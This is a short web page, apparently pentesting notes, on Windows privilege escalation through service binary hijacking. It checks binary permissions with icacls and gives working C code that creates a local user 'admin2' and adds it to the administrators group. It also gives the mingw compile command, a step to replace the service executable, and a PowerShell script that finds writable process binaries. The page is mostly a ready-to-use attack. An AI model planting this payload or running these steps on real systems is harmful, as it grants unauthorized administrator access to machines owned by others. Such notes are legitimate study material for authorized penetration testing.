Binary hijacking
Check if a binary (e.g. from a service) is writeable:
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(F)
NT AUTHORITY\Authenticated Users:(RX)
Legend:
- F = Full access
- R = Read access
- M = Modify access
- R = Read-only
- RX = Read and executeable
- W = Write-only
If yes, replace it with a more useful executeable, like this one.
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user admin2 password123! /add");
i = system ("net localgroup administrators admin2 /add");
return 0;
}
Compile this for the correct target architecture and replace the original file.
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Check this with one command:
Get-Process | ForEach-Object {
# Get the executable path
$exePath = $_.Path
# If the process doesn't have an accessible executable path (e.g., system processes), skip it
if ($exePath) {
try {
# Get ACL for the executable
$acl = Get-Acl $exePath
# Get current user
$currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# Check permissions for the current user
$userHasWritePermission = $false
foreach ($accessRule in $acl.Access) {
if ($accessRule.IdentityReference -eq $currentUser -and
$accessRule.FileSystemRights -match 'Write' -and
$accessRule.AccessControlType -eq 'Allow') {
$userHasWritePermission = $true
break
}
}
# Output result
[pscustomobject]@{
ProcessName = $_.ProcessName
ExecutablePath = $exePath
UserHasWritePermission = $userHasWritePermission
}
} catch {
# Handle errors for inaccessible paths or permission issues
[pscustomobject]@{
ProcessName = $_.ProcessName
ExecutablePath = $exePath
UserHasWritePermission = 'Error: ' + $_.Exception.Message
}
}
}
} | Format-Table UserHasWritePermission, ExecutablePath
Leave a Reply
You must be logged in to post a comment.